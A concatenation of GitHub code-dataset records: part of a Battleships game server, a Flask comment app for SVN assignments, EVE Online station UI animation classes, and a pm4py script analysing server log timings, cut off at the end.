threading.Thread(target=prepare_player,args=(ss_socket,game_server))\r\n\t\t\t\tt.start()\r\n\t\t\t\tthreads.append(t)\r\n\t\t\t\tprint(\"New player registered and waiting for more\")\r\n\t\t\telse: \r\n\t\t\t\t# no more connections allowed\r\n\t\t\t\tplayersocket.send(\"no more connections allowed\".encode())\r\n\t\t\t\tplayersocket.close()\r\n\texcept KeyboardInterrupt:\r\n\t\tif (game_server):\r\n\t\t\tgame_server.quit()\r\n\t\tserver_quitting = True\t\t# signal the ping and accept loops to stop\r\n\t\tprint(\"Keyboard Interrupt. Time to say goodbye!!!\")\r\n\texcept Exception as e:\r\n\t\tprint(e)\r\n\t\ttraceback.print_exc(file=sys.stdout)\r\n\tfinally:\r\n\t\tfor t in threads:\r\n\t\t\tt.join()\r\n\t\tif (game_server):\r\n\t\t\tgame_server.quit()\r\n\t\tprint(\"Waiting for all active games to finish\")\r\n\tprint(\"The end\")\r\n\tsys.exit(0) \r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","repo_name":"gautam-balamurali/Multiplayer-Battleships","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"13652689583","text":"# from flask import Flask\n# from flask import request,render_template\nfrom flask_sqlalchemy import SQLAlchemy\nimport sqlite3\nfrom contextlib import closing\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n abort, render_template, flash\nimport parser\n\n# FOllowed\n#https://github.com/mitsuhiko/flask/blob/master/examples/flaskr/flaskr.py\nDATABASE = 'Data/flask.db'\nDEBUG = True\nSECRET_KEY = 'development key'\nUSERNAME = 'admin'\nPASSWORD = 'default'\n\napp = Flask(__name__)\napp.config.from_object(__name__)\napp.config.from_envvar('FLASKR_SETTINGS', silent=True)\n\n\n\"\"\"\nCode to initialize the database\n\"\"\"\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('Data/schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n\"\"\"\nCode to connect to our database\n\"\"\"\ndef connect_db():\n rv = sqlite3.connect('DATABASE')\n rv.row_factory = sqlite3.Row\n return rv\n # return sqlite3.connect('DATABASE')\n\n\"\"\"\nCode to get our db so we can get entries\n\"\"\"\ndef get_db():\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\n\"\"\"\nCode to close your databse\n\"\"\"\n@app.teardown_appcontext\ndef close_connection(exception):\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\n\"\"\"\nLanding page will just have assignments and will render index.html\n\"\"\"\n@app.route('/')\ndef landing():\n svn_list = parser.parse_svn()\n db = get_db()\n cur = db.execute('select title, text from entries order by id desc')\n entries = cur.fetchall()\n return render_template('index.html',svn_list=svn_list[0],svn_log=svn_list[1],entries=entries)\n\n\n\n\"\"\"\niframe redirect page will add comments we will check if the comment\nis a original comment or reply and add to corresponding data base\nwe will also filter and check that naughty words are not being used\n\"\"\"\n@app.route('/add//', methods=['POST'])\ndef add_entry(directory,path):\n db = get_db()\n unique_file = directory + \"-\" + path\n if request.form['text'] == \"\":\n return redirect(url_for('iframe',path=path,directory=directory))\n if request.form['title'] == \"\":\n return redirect(url_for('iframe',path=path,directory=directory))\n\n if request.form['reply'] == \"\":\n title = request.form['title']\n text = request.form['text']\n title,text = filter(request.form['title'],request.form['text'])\n db.execute('insert into entries (title, text,file) values (?, ?, ?)',\n [title, text,unique_file])\n db.commit()\n else:\n title = request.form['title']\n text = request.form['text']\n reply = request.form['reply']\n title,text = filter(request.form['title'],request.form['text'])\n print('This is STUPID')\n db.execute('insert into reply_entries (parent_id,title, text,file) values (?, ?, ?,?)',\n [str(reply),title, text,unique_file])\n db.commit()\n return redirect(url_for('iframe',path=path,directory=directory))\n\n\"\"\"\nFor when you click on a specific assignment\ngives you details about all files in assignment\n\"\"\"\n@app.route('/')\ndef files(files):\n svn_list = parser.parse_svn()\n return render_template('details.html',svn_list=svn_list[0],\n svn_log=svn_list[1],assignment=files)\n\n\n\"\"\"\niframe page will display comments so we will get tables from etnries and reply_entries table\n\"\"\"\n@app.route('//')\ndef iframe(directory,path):\n svn_list = parser.parse_svn()\n db = get_db()\n # filter(request.form['title'],request.form['text'])\n\n db.commit()\n comment = db.execute('select 
title, text, file,id from entries order by id desc')\n replies = db.execute('select title,text,parent_id from reply_entries order by child_id desc')\n\n entries = comment.fetchall()\n replies = replies.fetchall()\n return render_template('show_entries.html',svn_list=svn_list[0],svn_log=svn_list[1],\n path=path,directory=directory,entries=entries,replies=replies)\n\n\"\"\"\nFilter function will check the naughty_words table against the title and text\nand will replace any naughty words\n\"\"\"\ndef filter(title,text):\n db = get_db()\n cur = db.execute('select * from naughty_words')\n replace = cur.fetchall()\n for word in replace:\n if word[0] in title:\n title = title.replace(word[0],word[1])\n if word[0] in text:\n text = text.replace(word[0],word[1])\n return title,text\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"alekfestekjian/WebPortfolio","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33638891933","text":"#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/eve/client/script/ui/station/captainsquarters/screenControls.py\nimport blue\nimport trinity\nimport uicls\nimport uiconst\nimport uthread\nimport uiutil\nimport util\nimport math\nimport random\nTIME_BASE = 0.3\n\nclass ScreenWedgeBracketTop(uicls.Transform):\n __guid__ = 'uicls.ScreenWedgeBracketTop'\n default_name = 'ScreenWedgeBracketTop'\n default_hasCorners = True\n default_wedgeWidth = 100\n default_wedgeTopStart = -10\n default_wedgePosRatio = 0.5\n default_align = uiconst.TOTOP\n default_height = 25\n default_rotation = 0.0\n\n def ApplyAttributes(self, attributes):\n global TIME_BASE\n uicls.Transform.ApplyAttributes(self, attributes)\n TIME_BASE = 0.3\n self.hasCorners = attributes.get('hasCorners', self.default_hasCorners)\n wedgeWidth = attributes.get('wedgeWidth', self.default_wedgeWidth)\n wedgeTopStart = attributes.get('wedgeTopStart', self.default_wedgeTopStart)\n self.wedgePosRatio = attributes.get('wedgePosRatio', self.default_wedgePosRatio)\n self.borderLeft = uicls.Frame(parent=self, name='borderLeft', texturePath='res:/UI/Texture/classes/CQMainScreen/borderLeft.png', cornerSize=16, align=uiconst.TOPLEFT, pos=(0, 1, 200, 48), padLeft=2, color=util.Color.WHITE)\n self.wedge = uicls.Frame(parent=self, name='wedge', texturePath='res:/UI/Texture/classes/CQMainScreen/wedge.png', cornerSize=13, align=uiconst.TOPLEFT, pos=(300,\n wedgeTopStart,\n wedgeWidth,\n 27), padding=(-5, 0, -5, 0), color=util.Color.WHITE)\n self.borderRight = uicls.Frame(parent=self, name='borderLeft', texturePath='res:/UI/Texture/classes/CQMainScreen/borderRight.png', cornerSize=16, align=uiconst.TOPRIGHT, pos=(0, 1, 200, 48), padRight=2, color=util.Color.WHITE)\n if self.hasCorners:\n self.cornerLeft = uicls.Sprite(parent=self, name='cornerLeft', texturePath='res:/UI/Texture/classes/CQMainScreen/cornerLeft.png', pos=(0, 0, 22, 22))\n self.cornerRight = uicls.Sprite(parent=self, name='cornerRight', texturePath='res:/UI/Texture/classes/CQMainScreen/cornerRight.png', pos=(0, 0, 22, 22), align=uiconst.TOPRIGHT)\n\n def _OnResize(self):\n if not hasattr(self, 'wedge'):\n return\n self.UpdatePosition()\n\n def UpdatePosition(self):\n w, h = self.GetAbsoluteSize()\n self.wedge.left = (w - self.wedge.width) * self.wedgePosRatio\n self.borderLeft.width = self.wedge.left\n self.borderRight.width = w - self.wedge.left - self.wedge.width\n\n def AnimAppear(self):\n if self.hasCorners:\n uicore.animations.FadeIn(self.cornerLeft, duration=TIME_BASE / 3, loops=3)\n uicore.animations.FadeIn(self.cornerRight, duration=TIME_BASE / 3, loops=3, sleep=True)\n uicore.animations.FadeIn(self.borderLeft, duration=TIME_BASE)\n uicore.animations.FadeIn(self.borderRight, duration=TIME_BASE)\n uicore.animations.FadeIn(self.wedge, duration=TIME_BASE / 3, loops=3, sleep=True)\n uicore.animations.MorphScalar(self.wedge, 'top', self.wedge.top, 0, duration=TIME_BASE, curveType=uiconst.ANIM_LINEAR, sleep=True)\n\n def AnimDisappear(self):\n uicore.animations.FadeOut(self)\n\n\nclass ScreenWedgeBracketBottom(ScreenWedgeBracketTop):\n __guid__ = 'uicls.ScreenWedgeBracketBottom'\n default_name = 'ScreenWedgeBracketBottom'\n default_align = uiconst.TOBOTTOM\n default_rotation = math.pi\n\n\nclass ScreenSimpleBracketTop(uicls.Frame):\n __guid__ = 'uicls.ScreenSimpleBracketTop'\n default_name = 'ScreenSimpleBracketTop'\n default_texturePath = 'res:/UI/Texture/classes/CQMainScreen/simpleBracketTop.png'\n default_cornerSize = 21\n 
default_align = uiconst.TOTOP\n default_height = 21\n default_color = util.Color.WHITE\n\n def AnimAppear(self):\n uicore.animations.FadeIn(self, duration=TIME_BASE)\n\n def AnimDisappear(self):\n uicore.animations.FadeOut(self, duration=TIME_BASE)\n\n\nclass ScreenSimpleBracketBottom(ScreenSimpleBracketTop):\n __guid__ = 'uicls.ScreenSimpleBracketBottom'\n default_name = 'ScreenSimpleBracketTop'\n default_texturePath = 'res:/UI/Texture/classes/CQMainScreen/simpleBracketBottom.png'\n default_align = uiconst.TOBOTTOM\n\n\nclass ScreenFrameBase(uicls.Container):\n __guid__ = 'uicls._ScreenFrameBase'\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n self.bracketLayer = uicls.Container(name='bracketCont', parent=self)\n self.mainCont = uicls.Container(name='mainCont', parent=self)\n self.topBracket = None\n self.bottomBracket = None\n uthread.new(self.AnimAppear)\n\n def AnimAppear(self):\n w, h = self.GetAbsoluteSize()\n uicore.animations.MorphScalar(self.topBracket, 'padTop', h / 2, 0, duration=TIME_BASE)\n uicore.animations.MorphScalar(self.bottomBracket, 'padBottom', h / 2, 0, duration=TIME_BASE, sleep=True)\n for obj in self.bracketLayer.children:\n uthread.new(obj.AnimAppear)\n blue.pyos.synchro.SleepWallclock(200)\n\n blue.pyos.synchro.SleepWallclock(2000)\n for c in self.mainCont.children:\n if hasattr(c, 'AnimAppear'):\n uthread.new(c.AnimAppear)\n\n\nclass ScreenFrame1(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame1'\n default_name = 'ScreenFrame1'\n\n def ApplyAttributes(self, attributes):\n uicls._ScreenFrameBase.ApplyAttributes(self, attributes)\n self.bottomBracket = uicls.ScreenWedgeBracketBottom(parent=self.bracketLayer, wedgePosRatio=0.3, rotation=math.pi, align=uiconst.TOBOTTOM)\n self.topBracket = uicls.ScreenWedgeBracketTop(parent=self.bracketLayer, wedgePosRatio=0.3, rotation=0)\n\n\nclass ScreenFrame2(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame2'\n default_name = 'ScreenFrame2'\n\n def ApplyAttributes(self, attributes):\n ScreenFrameBase.ApplyAttributes(self, attributes)\n self.topBracket = uicls.ScreenWedgeBracketTop(parent=self.bracketLayer, wedgePosRatio=0.3, wedgeWidth=200, hasCorners=False)\n self.bottomBracket = uicls.ScreenSimpleBracketBottom(parent=self.bracketLayer)\n\n\nclass ScreenFrame3(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame3'\n default_name = 'ScreenFrame3'\n\n def ApplyAttributes(self, attributes):\n ScreenFrameBase.ApplyAttributes(self, attributes)\n self.topBracket = uicls.ScreenSimpleBracketTop(parent=self.bracketLayer)\n self.bottomBracket = uicls.ScreenWedgeBracketBottom(parent=self.bracketLayer, wedgePosRatio=0.3, wedgeWidth=200, hasCorners=False)\n\n\nclass ScreenFrame4(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame4'\n default_name = 'ScreenFrame4'\n\n def ApplyAttributes(self, attributes):\n ScreenFrameBase.ApplyAttributes(self, attributes)\n self.topBracket = uicls.ScreenSimpleBracketTop(parent=self.bracketLayer)\n self.bottomBracket = uicls.ScreenSimpleBracketBottom(parent=self.bracketLayer)\n\n\nclass ScreenFrame5(ScreenFrame1):\n __guid__ = 'uicls.ScreenFrame5'\n default_name = 'ScreenFrame5'\n\n def ApplyAttributes(self, attributes):\n ScreenFrame1.ApplyAttributes(self, attributes)\n ScreenBlinkingSquares(parent=self.bracketLayer, padLeft=50, padBottom=-5, padRight=15)\n\n\nclass ScreenHeading1(uicls.Container):\n __guid__ = 'uicls.ScreenHeading1'\n default_name = 'ScreenHeading1'\n default_align = uiconst.TOTOP\n default_fillColor = (0.180392157, 0.219607843, 0.239215686, 
1.0)\n default_gradientColor = (0.152941176, 0.168627451, 0.17254902, 1.0)\n default_leftContWidth = 60\n default_height = 60\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n fillColor = attributes.get('fillColor', self.default_fillColor)\n gradientColor = attributes.get('gradientColor', self.default_gradientColor)\n leftContWidth = attributes.get('leftContWidth', self.default_leftContWidth)\n appear = attributes.get('appear', False)\n self.leftCont = uicls.Container(name='leftCont', parent=self, align=uiconst.TOLEFT, width=leftContWidth)\n uicls.Fill(name='leftBg', bgParent=self.leftCont, color=fillColor)\n self.mainCont = uicls.Container(name='mainCont', parent=self, padLeft=0, padRight=0)\n gradient = uicls.Sprite(name='rightGradient', bgParent=self.mainCont, color=gradientColor, texturePath='res:/UI/Texture/classes/CQMainScreen/gradientHoriz.png')\n if appear:\n uthread.new(self.AnimAppear)\n else:\n self.opacity = 0.0\n\n def AnimAppear(self):\n TIME_BASE = 0.2\n w, h = self.GetAbsoluteSize()\n self.opacity = 1.0\n uicore.animations.MorphScalar(self.leftCont, 'displayWidth', 0, self.leftCont.width, duration=TIME_BASE)\n uicore.animations.FadeIn(self.leftCont, duration=TIME_BASE / 3, loops=3, sleep=True)\n uicore.animations.MorphScalar(self.mainCont, 'displayWidth', 0, w - self.leftCont.width, duration=TIME_BASE)\n uicore.animations.FadeIn(self.mainCont, duration=TIME_BASE / 3, loops=3, sleep=True)\n\n\nclass ScreenHeading2(uicls.Container):\n __guid__ = 'uicls.ScreenHeading2'\n default_name = 'ScreenHeading2'\n default_height = 60\n default_width = 600\n default_align = uiconst.TOPLEFT\n default_text = ''\n default_opacity = 0.0\n default_hasBargraph = True\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n text = attributes.get('text', self.default_text)\n appear = attributes.get('appear', False)\n self.hasBargraph = attributes.get('hasBargraph', self.default_hasBargraph)\n rightCont = uicls.Container(name='rightCont', parent=self, align=uiconst.TORIGHT, width=446, padBottom=5)\n uicls.Sprite(name='rightGraphics', parent=rightCont, align=uiconst.TOBOTTOM, texturePath='res:/UI/Texture/classes/CQMainScreen/heading2.png', height=14)\n uicls.Fill(name='thickLine', parent=self, align=uiconst.TOBOTTOM, height=6, padBottom=9, color=util.Color.WHITE)\n self.label = uicls.Label(parent=self, text=text, top=10, fontsize=30, color=util.Color.WHITE)\n self.movingFill = uicls.Fill(name='movingFill', parent=self, align=uiconst.BOTTOMRIGHT, pos=(0, 0, 100, 3), color=util.Color.WHITE)\n if self.hasBargraph:\n barGraphCont = uicls.Container(name='bargraphCont', parent=self, align=uiconst.TOPRIGHT, pos=(10, 8, 332, 31))\n self.barGraph = uicls.Sprite(name='barGraph', parent=barGraphCont, texturePath='res:/UI/Texture/classes/CQMainScreen/barGraph.png', align=uiconst.CENTER, width=barGraphCont.width, height=31)\n self.barGraph.color.a = 0.6\n if appear:\n uthread.new(self.AnimAppear)\n\n def AnimAppear(self):\n TIME_BASE = 0.2\n uicore.animations.FadeIn(self, duration=TIME_BASE / 3, loops=3)\n uicore.animations.MorphScalar(self.movingFill, 'left', 0, 244, loops=uiconst.ANIM_REPEAT, curveType=uiconst.ANIM_WAVE, duration=2.0)\n if self.hasBargraph:\n uicore.animations.MorphScalar(self.barGraph, 'height', 0, 45, curveType=uiconst.ANIM_RANDOM, duration=1.0)\n\n\nclass ScreenHeading3(uicls.Container):\n __guid__ = 'uicls.ScreenHeading3'\n default_name = 'ScreenHeading3'\n default_height = 60\n default_width = 600\n 
default_align = uiconst.TOPLEFT\n default_text = ''\n default_opacity = 0.0\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n text = attributes.get('text', self.default_text)\n appear = attributes.get('appear', False)\n self.label = uicls.EveLabelMedium(parent=self, align=uiconst.CENTER, fontsize=self.height - 25, text=text)\n uicls.Fill(bgParent=self, color=(0.5, 0.5, 0.5, 1.0))\n if appear:\n uthread.new(self.AnimAppear)\n\n def AnimAppear(self):\n uicore.animations.BlinkIn(self, sleep=True)\n uicore.animations.BlinkIn(self.label, sleep=True)\n uicore.animations.MorphScalar(self.label, 'opacity', startVal=1.0, endVal=0.5, curveType=uiconst.ANIM_WAVE, loops=uiconst.ANIM_REPEAT)\n\n\nclass ScreenBlinkingSquares(uicls.Container):\n __guid__ = 'uicls.ScreenBlinkingSquares'\n default_name = 'ScreenBlinkingSquares'\n default_height = 10\n default_align = uiconst.TOBOTTOM\n default_opacity = 0.0\n default_padBottom = 10\n default_padLeft = 10\n default_padRight = 10\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n left1 = uicls.Fill(name='left1', parent=self, align=uiconst.TOLEFT, width=8, padBottom=5, color=util.Color.WHITE)\n left2 = uicls.Fill(name='left2', parent=self, align=uiconst.TOLEFT, width=30, padLeft=3, color=util.Color.WHITE)\n left3 = uicls.Fill(name='left3', parent=self, align=uiconst.TOLEFT, width=8, padLeft=3, color=util.Color.WHITE)\n self.label = uicls.EveLabelSmall(parent=self, align=uiconst.TOLEFT, width=100, padLeft=5)\n self.right1 = uicls.Fill(name='right1', parent=self, align=uiconst.TORIGHT, width=50, color=util.Color.WHITE)\n self.right2 = uicls.Fill(name='right2', parent=self, align=uiconst.TORIGHT, width=50, color=util.Color.WHITE, padRight=3)\n self.right3 = uicls.Fill(name='right3', parent=self, align=uiconst.TORIGHT, width=50, color=util.Color.WHITE, padRight=3)\n\n def AnimAppear(self):\n TIME_BASE = 0.2\n uicore.animations.FadeIn(self, duration=TIME_BASE / 3, loops=3)\n uthread.new(self.UpdateBitCounter)\n uthread.new(self.UpdateText)\n\n def UpdateText(self):\n x1 = 10000\n x2 = 30000\n msgList = ['59 4F 55 20',\n '48 41 56 45',\n '20 57 41 59',\n '20 54 4F 4F',\n '20 4D 55 43',\n '48 20 54 49',\n '4D 45 20 4F',\n '4E 20 59 4F',\n '55 52 20 48',\n '41 4E 44 53']\n while not self.destroyed:\n for msg in msgList:\n self.label.text = '%s' % msg\n uicore.animations.FadeIn(self.label, duration=TIME_BASE / 3, loops=3)\n blue.pyos.synchro.SleepWallclock(random.randint(1000, 2000))\n if self.label.destroyed:\n return\n\n def UpdateBitCounter(self):\n count = 0\n while not self.destroyed:\n val = max(0.2, count & 1)\n uicore.animations.FadeTo(self.right1, self.right1.opacity, val)\n val = max(0.2, count >> 1 & 1)\n uicore.animations.FadeTo(self.right2, self.right2.opacity, val)\n val = max(0.2, count >> 2 & 1)\n uicore.animations.FadeTo(self.right3, self.right3.opacity, val)\n count += 1\n if count == 8:\n count = 0\n blue.pyos.synchro.SleepWallclock(1000)\n\n\nclass AutoTextScroll(uicls.Container):\n __guid__ = 'uicls.AutoTextScroll'\n default_name = 'AutoScrollHorizontal'\n default_scrollSpeed = 10\n default_clipChildren = True\n default_textList = None\n default_fontSize = 30\n default_fadeColor = util.Color.BLACK\n default_fadeWidth = 100\n default_color = util.Color.WHITE\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n textList = attributes.get('textList', self.default_textList)\n self.scrollSpeed = 
attributes.get('scrollSpeed', self.default_scrollSpeed)\n self.fontSize = attributes.get('fontSize', self.default_fontSize)\n fadeColor = attributes.get('fadeColor', self.default_fadeColor)\n fadeWidth = attributes.get('fadeWidth', self.default_fadeWidth)\n self.color = attributes.get('color', self.default_color)\n self.scrollThread = None\n if fadeColor:\n uicls.Sprite(name='leftFade', parent=self, texturePath='res:/UI/Texture/classes/CQMainScreen/autoTextGradientLeft.png', color=fadeColor, align=uiconst.TOLEFT, width=fadeWidth, state=uiconst.UI_DISABLED)\n uicls.Sprite(name='leftFade', parent=self, texturePath='res:/UI/Texture/classes/CQMainScreen/autoTextGradientRight.png', color=fadeColor, align=uiconst.TORIGHT, width=fadeWidth, state=uiconst.UI_DISABLED)\n self.textCont = uicls.Container(name='textCont', parent=self, align=uiconst.CENTERLEFT, height=self.fontSize)\n if textList:\n self.SetTextList(textList)\n\n def SetTextList(self, textList, funcList = None, funcKeywordsList = None):\n self.textCont.Flush()\n if self.scrollThread:\n self.scrollThread.kill()\n if not textList:\n return\n x = 0\n for i, text in enumerate(textList):\n if i != 0:\n bullet = uicls.Sprite(parent=self.textCont, align=uiconst.CENTERLEFT, texturePath='res:/UI/texture/classes/CQMainScreen/bullet.png', pos=(x,\n 0,\n 11,\n 11), color=self.color)\n bulletWidth = bullet.width + 10\n else:\n bulletWidth = 0\n if funcList:\n clickFunc = funcList[i]\n else:\n clickFunc = None\n if funcKeywordsList:\n funcKeywords = funcKeywordsList[i]\n else:\n funcKeywords = None\n labelCont = uicls._AutoTextLabelCont(parent=self.textCont, clickFunc=clickFunc, funcKeywords=funcKeywords, left=x + bulletWidth, align=uiconst.TOPLEFT)\n label = uicls.Label(parent=labelCont, text='%s' % text, fontsize=self.fontSize, color=self.color)\n labelCont.width = label.width\n labelCont.height = label.height\n x += label.width + 10 + bulletWidth\n\n self.textCont.width = x\n self.textCont.height = label.height\n self.scrollThread = uthread.new(self.ScrollThread)\n\n def ScrollThread(self):\n w, h = self.GetAbsoluteSize()\n self.textCont.left = w\n while not self.destroyed:\n duration = self.textCont.width / float(self.scrollSpeed)\n uicore.animations.MorphScalar(self.textCont, 'left', startVal=w, endVal=-self.textCont.width, duration=duration, curveType=uiconst.ANIM_LINEAR, sleep=True)\n\n\nclass LabelCont(uicls.Container):\n __guid__ = 'uicls._AutoTextLabelCont'\n default_state = uiconst.UI_NORMAL\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n self.hoverFill = uicls.Fill(parent=self, color=(1.0, 1.0, 1.0, 0.0), padLeft=-5, padRight=-5)\n self.clickFunc = attributes.get('clickFunc', None)\n self.funcKeywords = attributes.get('funcKeywords', None)\n\n def OnMouseEnter(self, *args):\n if self.clickFunc:\n uicore.animations.FadeIn(self.hoverFill, endVal=0.5, duration=0.3)\n\n def OnMouseExit(self, *args):\n if self.clickFunc:\n uicore.animations.FadeOut(self.hoverFill)\n\n def OnClick(self, *args):\n if self.clickFunc:\n if self.funcKeywords:\n self.clickFunc(**self.funcKeywords)\n else:\n self.clickFunc()\n\n\nclass TextBanner(uicls.Container):\n __guid__ = 'uicls.TextBanner'\n default_height = 80\n default_align = uiconst.TOBOTTOM\n default_leftContWidth = 0\n default_scrollText = True\n default_fontSize = 30\n default_color = (0.15, 0.15, 0.15, 1.0)\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n text = attributes.get('text', '')\n textList = 
attributes.get('textList', None)\n if textList is None:\n textList = [text]\n fontSize = attributes.get('fontSize', self.default_fontSize)\n leftContWidth = attributes.get('leftContWidth', self.default_leftContWidth)\n color = attributes.get('color', self.default_color)\n self.leftCont = uicls.Container(name='leftCont', parent=self, align=uiconst.TOLEFT, width=leftContWidth)\n autoText = uicls.AutoTextScroll(parent=self, align=uiconst.TOALL, scrollSpeed=70, fontSize=fontSize, textList=textList, fadeColor=color)\n uicls.Sprite(bgParent=self, texturePath='res:/UI/Texture/Classes/CQMainScreen/autoTextGradientLeft.png', color=color)","repo_name":"alexcmd/eve","sub_path":"eve-8.21.494548/eve/client/script/ui/station/captainsquarters/screenControls.py","file_name":"screenControls.py","file_ext":"py","file_size_in_byte":20219,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"}
+{"seq_id":"70435899293","text":"from numpy.core.fromnumeric import var\nfrom pm4py.objects.conversion.log import converter as log_converter\nfrom pm4py.algo.filtering.log.variants import variants_filter\nfrom pm4py.objects.log.util import interval_lifecycle\nfrom pm4py.algo.filtering.log.variants import variants_filter\nfrom math import sqrt\nfrom random import randint\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n## Point 2\n# Since the log files are in a different format, it is necessary to make them compatible with PM4PY before processing them\ndf_web_server = pd.read_csv(\"WEB_SERVER.log\", sep=' ', header=None)\ndf_web_server[5] = (df_web_server[5] + df_web_server[6]).str.strip(\"[]\")\ndf_web_server[5] = pd.to_datetime(df_web_server[5], format='%d/%b/%Y:%H:%M:%S%z')\ndf_web_server = df_web_server.drop(labels=[0, 2, 3, 6, 9, 11, 12], axis=1)\ndf_web_server = df_web_server.rename(columns={1: \"IP\", 4: \"ID\", 5: \"TIMESTAMP\", 7: \"REQUEST\", 8: \"CODE\", 10: \"URL\"})\n\n# print(df_web_server)\n\ndf_application_server = pd.read_csv(\"APPLICATION_SERVER.log\", sep=' ', header=None)\ndf_application_server[3] = (df_application_server[3] + df_application_server[4]).str.strip(\"[]\")\ndf_application_server[3] = pd.to_datetime(df_application_server[3], format='%d/%b/%Y:%H:%M:%S%z')\ndf_application_server = df_application_server.drop(labels=[1, 2, 4, 7], axis=1)\ndf_application_server = df_application_server.rename(columns={0: \"IP\", 3: \"TIMESTAMP\", 5: \"REQUEST\", 6: \"CODE\"})\n\n# print(df_application_server)\n\ndf_joined = df_web_server.join(df_application_server[\"TIMESTAMP\"], lsuffix=\"_WS\", rsuffix=\"_AS\")\ndf_joined[\"TIME_DELTA\"] = (df_joined[\"TIMESTAMP_AS\"] - df_joined[\"TIMESTAMP_WS\"]) / pd.Timedelta(seconds=1)\n\n# print(df_joined)\n\nmy_col = [x for x in range(50)]\ndf_database_server = pd.read_csv(\"DATABASE_SERVER.log\", sep=' ', header=None, names=my_col)\ndf_database_server = df_database_server.fillna('')\ndf_database_server[0] = df_database_server[0] + ':' + df_database_server[1] + \"+0200\"\ndf_database_server[0] = pd.to_datetime(df_database_server[0], format='%Y-%m-%d:%H:%M:%S.%f%z')\n\nfor i in range(6, 17):\n df_database_server[5] = df_database_server[5] + ' ' + df_database_server[i]\n\ndel_col = [1, 2, 6]\ndel_col.extend([n for n in range(7, 50)])\ndf_database_server = df_database_server.drop(labels=del_col, axis=1)\ndf_database_server = df_database_server.rename(columns={0: \"TIMESTAMP\", 3: \"ID\", 4: \"DATABASE\", 5: \"OPERATION\"})\ndf_database_server = df_database_server[df_database_server.DATABASE == \"postgres@infinity41_sp27p\"].reset_index()\n\n# print(df_database_server)\n\n## Point 3\nsize = len(df_database_server[\"TIMESTAMP\"])\ndb_delta_times = []\ndb_timestamps = []\nfor n in range(0, size, 15):\n try:\n last_op = df_database_server.at[n+15, 'TIMESTAMP']\n except:\n last_op = df_database_server.at[size-1, \"TIMESTAMP\"]\n first_op = df_database_server.at[n, \"TIMESTAMP\"]\n time_delta = (last_op - first_op) / pd.Timedelta(seconds=1)\n db_delta_times.append(time_delta)\n db_timestamps.append(first_op)\n\n\ndf_joined[\"TIME_DELTA_DB\"] = db_delta_times[:len(df_joined)]\ndf_joined[\"TIMESTAMP_DB\"] = db_timestamps[:len(df_joined)]\n\n# print(df_joined)\n\n#Point 4\nprint(df_joined.describe())\n\nplt.subplot(2, 1, 1)\nplt.plot(df_joined.index, df_joined[\"TIME_DELTA_DB\"])\nplt.title(\"Db time delta linechart\")\n\nplt.subplot(2, 1, 2)\nplt.scatter(df_joined.index, df_joined[\"TIME_DELTA_DB\"])\nplt.xlabel(\"Request 
number\")\nplt.ylabel(\"Time delta\")\nplt.title(\"Db time delta scatter chart\")\n\n# plt.show()\n\n# Remove outliers\ndf_joined_size = len(df_joined)\ndf_joined = df_joined[df_joined.TIME_DELTA_DB < 5]\nprint(\"\\nPercentage of overdue cases {0:.2g}%\\n\".format((df_joined_size - len(df_joined)) / size * 100))\n\nprint(df_joined.describe())\n\n## Point 5\ndf_joined[\"ID\"] = df_joined[\"ID\"].astype(str)\ndf_joined = df_joined.rename(columns={\"ID\": \"case:concept:name\", \"REQUEST\": \"concept:name\", \"TIMESTAMP_DB\": \"time:timestamp\"})\nparameters = {log_converter.Variants.TO_EVENT_LOG.value.Parameters.CASE_ID_KEY: 'case:concept:name'}\nevent_log = log_converter.apply(df_joined, parameters=parameters, variant=log_converter.Variants.TO_EVENT_LOG)\n\n# print(event_log)\n\nevent_log = interval_lifecycle.assign_lead_cycle_time(event_log)\n\n# print(\"\\nPercentile below the safe performance score 3 sec {}%\".format(count / ))\n\nvariants = variants_filter.get_variants(event_log)\n\n# print(variants)\n\nprint('\\nEvents: {} - Cases: {} - Variants: {}'.format(df_joined_size, len(event_log), len(variants)))\n\ndef performance_analysis(variants):\n variants_scores = {}\n count = 0\n for key, value in variants.items():\n variants_scores[key] = 0\n for event in value[0]:\n variants_scores[key] += event[\"TIME_DELTA_DB\"]\n \n performance_drop_variant = max(variants_scores, key=variants_scores.get)\n\n performance_drop_value = variants_scores[performance_drop_variant]\n\n print(\"\\n{0:.2g} is the most variant performance drop\".format(performance_drop_value))\n\n plt2 = plt.figure()\n ax1 = plt2.add_subplot(111)\n ax1.plot([x for x in range(len(variants_scores))], variants_scores.values())\n # plt.show()\n\n count = 0\n for value in variants_scores.values():\n if value < 3:\n count += 1\n\n print(\"\\nPercentile under 3 sec time delta db {:.2f}%\".format(count / len(variants_scores) * 100))\n\n # Remove the variant 